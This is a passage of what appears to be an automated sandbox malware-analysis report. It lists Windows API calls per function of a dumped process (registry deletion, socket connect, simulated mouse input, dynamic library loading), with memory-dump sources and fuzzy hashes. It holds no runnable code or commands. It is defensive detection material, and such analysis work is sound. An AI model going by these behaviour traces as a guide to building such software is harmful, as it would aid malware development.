• Opcode ID: 3d6b0d0159c2325d5fa6f8f21f2b4f7025ddc55e5d8602cc91d7a5e03b8305c1
• Instruction ID: 7c090cb1566fcd58ec8cfcb9776f32647a2901564b7a47900558cbc21ea2f444
• Opcode Fuzzy Hash: 3d6b0d0159c2325d5fa6f8f21f2b4f7025ddc55e5d8602cc91d7a5e03b8305c1
• Instruction Fuzzy Hash: F7419E715083449EC752EB74D841ADBB7E8AF8D340F50292EF489E7191EB34E648C762
APIs
• _memset.LIBCMT ref: 00EC78CF
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EC7976
• IsMenu.USER32(?), ref: 00EC798E
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EC79D6
• DrawMenuBar.USER32 ref: 00EC79E9
Strings
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: e8edb96d1c5e375035617d974310345c9397f617e080d4c22211552a09691143
• Instruction ID: 64a4339fd66467d5540a89879484aefec58f52a1cbe58765f8e1039467caeaa7
• Opcode Fuzzy Hash: e8edb96d1c5e375035617d974310345c9397f617e080d4c22211552a09691143
• Instruction Fuzzy Hash: E4416571A08208EFDB20DF54E984FAABBF9FB49314F059169E985A7250C731ED51CFA0
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00EC1631
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EC165B
• FreeLibrary.KERNEL32(00000000), ref: 00EC1712
  • Part of subcall function 00EC1602: RegCloseKey.ADVAPI32(?), ref: 00EC1678
  • Part of subcall function 00EC1602: FreeLibrary.KERNEL32(?), ref: 00EC16CA
  • Part of subcall function 00EC1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00EC16ED
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00EC16B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 395352322-0
                                                                                                          • Opcode ID: c6b220002a79112239593dca2542036a8c597ef1cd5b993383b3755370e7528b
                                                                                                          • Instruction ID: cc3f9faecdfa7fc1b8c568a47df5580e658ad4c823f2352319b4bd1d1067d796
                                                                                                          • Opcode Fuzzy Hash: c6b220002a79112239593dca2542036a8c597ef1cd5b993383b3755370e7528b
                                                                                                          • Instruction Fuzzy Hash: 42314D71901109BFDB149B90DD85FFEB7BCEF0A304F1411AEE515F2141EA719E4A9BA0
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00EC6911
• GetWindowLongW.USER32(010C5680,000000F0), ref: 00EC6944
• GetWindowLongW.USER32(010C5680,000000F0), ref: 00EC6979
• SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00EC69AB
• SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00EC69D5
• GetWindowLongW.USER32(?,000000F0), ref: 00EC69E6
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC6A00
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: 658414e95dda0825b76f3de26c97318d72293a5b21518c9393aae48c651c70bd
• Instruction ID: 34bab6b322e92c73f3ebe82092d91d9933397b112681f3125810c335ed0550fb
• Opcode Fuzzy Hash: 658414e95dda0825b76f3de26c97318d72293a5b21518c9393aae48c651c70bd
• Instruction Fuzzy Hash: 803137306042549FDB21CF19DE88F6637E1FB89318F2851A8F515AF2B1CB72AC46DB40
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9E2CA
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9E2F0
• SysAllocString.OLEAUT32(00000000), ref: 00E9E2F3
• SysAllocString.OLEAUT32(?), ref: 00E9E311
• SysFreeString.OLEAUT32(?), ref: 00E9E31A
• StringFromGUID2.OLE32(?,?,00000028), ref: 00E9E33F
• SysAllocString.OLEAUT32(?), ref: 00E9E34D
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 3dd9027e8cf34551dd7e616e8e120b82259a31131accab4f989df1162168380f
• Instruction ID: 3edeb4331b422ae18f2e825924207f3b63df8139e99d9443ee0362a63da950d2
• Opcode Fuzzy Hash: 3dd9027e8cf34551dd7e616e8e120b82259a31131accab4f989df1162168380f
• Instruction Fuzzy Hash: 68219776605219BF9F50DFA9DC88DBF77ACEB08364B484125FA18EB350D670DC458760
APIs
  • Part of subcall function 00EB8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EB84A0
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EB68B1
• WSAGetLastError.WSOCK32(00000000), ref: 00EB68C0
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EB68F9
• connect.WSOCK32(00000000,?,00000010), ref: 00EB6902
• WSAGetLastError.WSOCK32 ref: 00EB690C
• closesocket.WSOCK32(00000000), ref: 00EB6935
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EB694E
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: 210ba0d6c96777293762303cf3a300b1d5722dd41a983b01e3bbc9d4d060e7a4
• Instruction ID: ca27cfa70d54f786f6b5311a29ad897e2bad38f8a90feba65f8be3fd07089ae3
• Opcode Fuzzy Hash: 210ba0d6c96777293762303cf3a300b1d5722dd41a983b01e3bbc9d4d060e7a4
• Instruction Fuzzy Hash: 5631B171600208AFDB14AF64DC85FFE77E9EB44724F04502AFD05BB291CB74AD048BA1
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9E3A5
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9E3CB
• SysAllocString.OLEAUT32(00000000), ref: 00E9E3CE
• SysAllocString.OLEAUT32 ref: 00E9E3EF
• SysFreeString.OLEAUT32 ref: 00E9E3F8
• StringFromGUID2.OLE32(?,?,00000028), ref: 00E9E412
• SysAllocString.OLEAUT32(?), ref: 00E9E420
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 411f2f5f1b70cde830d4cedd360545833bcb0d338c5481157eeeb1a714b28a15
• Instruction ID: 5c92c4e50366896c9ed584f76bee80dffb04b85cf5c8588ba11c365bc478859a
• Opcode Fuzzy Hash: 411f2f5f1b70cde830d4cedd360545833bcb0d338c5481157eeeb1a714b28a15
• Instruction Fuzzy Hash: DE218835605104BF9F50DFA9DC88DAF77ECEB48364B048125FA15EB360D670EC4587A4
APIs
  • Part of subcall function 00E42111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E4214F
  • Part of subcall function 00E42111: GetStockObject.GDI32(00000011), ref: 00E42163
  • Part of subcall function 00E42111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4216D
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EC7C57
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EC7C64
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EC7C6F
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EC7C7E
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EC7C8A
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: aa726f4ebb5fd971ebe52c2b356677d8d05257683948742efb915fe4a0aa9937
• Instruction ID: 117917f32cbd121ace371cf4314b12669a2b629c3bde58e6351ba5b6eacdbad2
• Opcode Fuzzy Hash: aa726f4ebb5fd971ebe52c2b356677d8d05257683948742efb915fe4a0aa9937
• Instruction Fuzzy Hash: 981190B214021EBEEF159F60CC85EEBBF5DEF08798F015115BB48A6090C672AC21DBA0
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E64282,?), ref: 00E641D3
• GetProcAddress.KERNEL32(00000000), ref: 00E641DA
• EncodePointer.KERNEL32(00000000), ref: 00E641E6
• DecodePointer.KERNEL32(00000001,00E64282,?), ref: 00E64203
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 3489934621-340411864
• Opcode ID: 7e645799b61b2b2545488e7a8434e947048778fbf30fa36603df3ca4cdaae794
• Instruction ID: c24871b8f56314f6514b7898a94aac479e19373f82bdefbe54705a980d17687c
• Opcode Fuzzy Hash: 7e645799b61b2b2545488e7a8434e947048778fbf30fa36603df3ca4cdaae794
• Instruction Fuzzy Hash: 36E0E570692705AFDA501B71FC4DB0937A5F711B0AF605425B441F51E0CBF544899E10
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E641A8), ref: 00E642A8
• GetProcAddress.KERNEL32(00000000), ref: 00E642AF
• EncodePointer.KERNEL32(00000000), ref: 00E642BA
• DecodePointer.KERNEL32(00E641A8), ref: 00E642D5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: 06aab2073eb99fe502a5adb6eee17fe57e90a10950cf3f579abaeae9d196041d
• Instruction ID: 0e591a207ab003cc19036cd73dea00bf51dc769aaddfba58aa52dc6c541b6a31
• Opcode Fuzzy Hash: 06aab2073eb99fe502a5adb6eee17fe57e90a10950cf3f579abaeae9d196041d
• Instruction Fuzzy Hash: 63E0BDB0692B14AFEB519B61BD0DB463BA6FB08F46F68111AF001F51F0CBF54608EE10
                                                                                                          APIs
                                                                                                          • GetClientRect.USER32(?,?), ref: 00E421B8
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E421F9
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00E42221
                                                                                                          • GetClientRect.USER32(?,?), ref: 00E42350
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E42369
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                           • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1296646539-0
                                                                                                          • Opcode ID: 7bb6620c45e97d1c960341c9cf597ac8eebf82a0909911d7b8b2fc7fe985f447
                                                                                                          • Instruction ID: 30815fba496d36abd1e14a6e6585e247c85763ecb8be828d2cf91262a3df19a1
                                                                                                          • Opcode Fuzzy Hash: 7bb6620c45e97d1c960341c9cf597ac8eebf82a0909911d7b8b2fc7fe985f447
                                                                                                          • Instruction Fuzzy Hash: DAB17D3990024ADBDF10CFA8D8807EDB7B1FF08714F54A129EE59EB254DB70A950DB54
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                           • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3253778849-0
                                                                                                          • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                                                                          • Instruction ID: 23a43816db18a5a024bf591fdb4a937180c9eebbf7c0085135d3f6aeca51d91b
                                                                                                          • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                                                                          • Instruction Fuzzy Hash: 8761AD7160025AABCF12EF60D881FFE77E4AF0A348F086559F8557B192DB31AD45CB60
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00EC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EC040D,?,?), ref: 00EC1491
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EC091D
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EC095D
                                                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EC0980
                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EC09A9
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EC09EC
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EC09F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                           • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4046560759-0
                                                                                                          • Opcode ID: 928c9525969d363663a7c9101e7011f2f7d6d03a0abdf86eb82148d5c4d4d6cb
                                                                                                          • Instruction ID: 125fd1c8dbd85b7af9ecf091cf0256585349da8d380471c2d6b364e3ebfe9f17
                                                                                                          • Opcode Fuzzy Hash: 928c9525969d363663a7c9101e7011f2f7d6d03a0abdf86eb82148d5c4d4d6cb
                                                                                                          • Instruction Fuzzy Hash: 53516931208200EFD714EF64C985F6ABBE9FF85314F04591DF995A72A2DB32E909CB52
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00E9F6A2
                                                                                                          • VariantClear.OLEAUT32(00000013), ref: 00E9F714
                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 00E9F76F
                                                                                                          • _memmove.LIBCMT ref: 00E9F799
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00E9F7E6
                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E9F814
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                           • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1101466143-0
                                                                                                          • Opcode ID: d27103a97cb5f51971af0691a40ea291ef4d4ce2fa984cb22fdcf717af1c73cf
                                                                                                          • Instruction ID: a342e3d358545e8bbbe2559e767fb884b61f54cbf7fb615e73f06c028766cece
                                                                                                          • Opcode Fuzzy Hash: d27103a97cb5f51971af0691a40ea291ef4d4ce2fa984cb22fdcf717af1c73cf
                                                                                                          • Instruction Fuzzy Hash: 885148B5A00209EFCB14CF58D894AAAB7B8FF4C354F15856AE959EB310D730E911CFA0
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EA29FF
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EA2A4A
                                                                                                          • IsMenu.USER32(00000000), ref: 00EA2A6A
                                                                                                          • CreatePopupMenu.USER32 ref: 00EA2A9E
                                                                                                          • GetMenuItemCount.USER32(000000FF), ref: 00EA2AFC
                                                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EA2B2D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                           • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3311875123-0
                                                                                                          • Opcode ID: 3e072517580bb0298b1126dbea65239f7e20670a20378a8044dc8870f41eea2f
                                                                                                          • Instruction ID: 212af57cf713b831acd75f35af4a59ac53827b2726335acd144be844e951bee1
                                                                                                          • Opcode Fuzzy Hash: 3e072517580bb0298b1126dbea65239f7e20670a20378a8044dc8870f41eea2f
                                                                                                          • Instruction Fuzzy Hash: F6518E70A002099FDF25CF6CD888BAEBBF4AF4A318F14515DE911BF2A1D770A944CB61
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E41B76
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E41BDA
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00E41BF7
                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E41C08
                                                                                                          • EndPaint.USER32(?,?), ref: 00E41C52
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                           • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                          • String ID:
                                                                                                          • API String ID: 1827037458-0
                                                                                                          • Opcode ID: 876858cf001ea8ea392a7f014bb13f0abf33f36df127297398c67c413f00cd29
                                                                                                          • Instruction ID: 14e746f10ff5e407451dcb2abe6b7585772ce741097cd307abab76b4f69ad15b
                                                                                                          • Opcode Fuzzy Hash: 876858cf001ea8ea392a7f014bb13f0abf33f36df127297398c67c413f00cd29
                                                                                                          • Instruction Fuzzy Hash: 1441C370504304AFDB10DF25ECC8FAA7BE8FB45364F1445A9F9A9A72A1C730A845DB61
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00EB550C,?,?,00000000,00000001), ref: 00EB7796
                                                                                                            • Part of subcall function 00EB406C: GetWindowRect.USER32(?,?), ref: 00EB407F
                                                                                                          • GetDesktopWindow.USER32 ref: 00EB77C0
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00EB77C7
                                                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EB77F9
                                                                                                            • Part of subcall function 00EA57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EA5877
                                                                                                          • GetCursorPos.USER32(?), ref: 00EB7825
                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EB7883
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                           • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                           • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4137160315-0
                                                                                                          • Opcode ID: 965b29a0c889232286d9f2609f5fa14f6ec0fe01727c1c85b1f2e707a033d2b0
                                                                                                          • Instruction ID: 19895c1563672e946e400ca597a615e8d5e998b68c2a0e78ab9ee47de562063a
                                                                                                          • Opcode Fuzzy Hash: 965b29a0c889232286d9f2609f5fa14f6ec0fe01727c1c85b1f2e707a033d2b0
